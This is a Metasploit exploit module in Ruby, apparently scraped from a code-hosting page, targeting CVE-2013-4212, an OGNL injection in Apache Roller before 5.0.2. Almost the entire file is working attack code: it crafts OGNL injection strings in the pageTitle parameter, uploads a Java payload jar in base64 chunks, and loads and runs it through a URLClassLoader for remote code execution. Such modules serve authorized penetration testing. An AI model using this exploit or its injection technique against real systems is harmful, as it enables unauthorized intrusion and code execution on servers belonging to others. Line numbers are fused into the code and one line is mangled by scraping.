Path: blob/master/modules/exploits/multi/http/apache_roller_ognl_injection.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::FileDropper1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Apache Roller OGNL Injection',16'Description' => %q{17This module exploits an OGNL injection vulnerability in Apache Roller < 5.0.2. The18vulnerability is due to an OGNL injection on the UIAction controller because of an19insecure usage of the ActionSupport.getText method. This module has been tested20successfully on Apache Roller 5.0.1 on Ubuntu 10.04.21},22'Author' => [23'Unknown', # From coverity.com / Vulnerability discovery24'juan vazquez' # Metasploit module25],26'License' => MSF_LICENSE,27'References' => [28[ 'CVE', '2013-4212'],29[ 'URL', 'http://security.coverity.com/advisory/2013/Oct/remote-code-execution-in-apache-roller-via-ognl-injection.html']30],31'Platform' => 'java',32'Arch' => ARCH_JAVA,33'Privileged' => true,34'Targets' => [35[ 'Apache Roller 5.0.1', {} ]36],37'DisclosureDate' => '2013-10-31',38'DefaultTarget' => 0,39'Notes' => {40'Reliability' => UNKNOWN_RELIABILITY,41'Stability' => UNKNOWN_STABILITY,42'SideEffects' => UNKNOWN_SIDE_EFFECTS43}44)45)4647register_options(48[49Opt::RPORT(8080),50OptString.new('TARGETURI', [ true, 'The path to the Apache Roller application.', "/roller"])51]52)53end5455def execute_command(cmd)56injection = "%24{(%23_memberAccess[\"allowStaticMethodAccess\"]%3dtrue,CMD,'')}"57injection.gsub!(/CMD/, Rex::Text::uri_encode(cmd))5859vprint_status("Attempting to execute: #{cmd}")6061res = send_request_cgi({62'method' => 'GET',63'uri' => normalize_uri(target_uri.path.to_s, "roller-ui", "login.rol"),64'encode_params' => false,65'vars_get' =>66{67'pageTitle' => injection68}69})70end7172def java_upload_part(part, filename, append = 'false')73cmd = "#f=new java.io.FileOutputStream('#{filename}'+#a,#{append}),"74cmd << "#f.write(new sun.misc.BASE64Decoder().decodeBuffer('#{Rex::Text.encode_base64(part)}')),"75cmd << "#f.close(),#a='#{@random_suffix}'"76execute_command(cmd)77end7879def exploit80print_status("Checking injection...")8182if check == Exploit::CheckCode::Vulnerable83print_good("Target looks vulnerable, exploiting...")84else85print_warning("Target not found as vulnerable, trying anyway...")86end8788@random_suffix = rand_text_alphanumeric(3) # To avoid duplicate execution89@payload_exe = rand_text_alphanumeric(4 + rand(4)) + ".jar"90append = 'false'91jar = payload.encoded_jar.pack9293chunk_length = 384 # 512 bytes when base64 encoded9495parts = jar.chars.each_slice(chunk_length).map(&:join)96parts.each do |part|97java_upload_part(part, @payload_exe, append)98append = 'true'99end100101register_files_for_cleanup("#{@payload_exe}null", "#{@payload_exe}#{@random_suffix}")102103cmd = ""104# disable Vararg handling (since it is buggy in OGNL used by Struts 2.1105cmd << "#[email protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"106cmd << "#q.setAccessible(true),#q.set(null,true),"107cmd << "#[email protected]@forName('ognl.OgnlRuntime').getDeclaredField('_jdk15'),"108cmd << "#q.setAccessible(true),#q.set(null,false),"109# create classloader110cmd << "#cl=new java.net.URLClassLoader(new java.net.URL[]{new java.io.File('#{@payload_exe}'+#a).toURI().toURL()}),#a='#{rand_text_alphanumeric(4)}',"111# load class112cmd << "#c=#cl.loadClass('metasploit.Payload'),"113# invoke main method114cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("115cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"116execute_command(cmd)117end118119def check120addend_one = rand_text_numeric(rand(3) + 1).to_i121addend_two = rand_text_numeric(rand(3) + 1).to_i122sum = addend_one + addend_two123124res = send_request_cgi({125'method' => 'GET',126'uri' => normalize_uri(target_uri.path.to_s, "roller-ui", "login.rol"),127'vars_get' =>128{129'pageTitle' => "${new java.lang.Integer(#{addend_one}+#{addend_two})}",130}131})132133if res and res.code == 200 and res.body =~ /#{sum}/134return Exploit::CheckCode::Vulnerable135end136137return Exploit::CheckCode::Safe138end139end140141142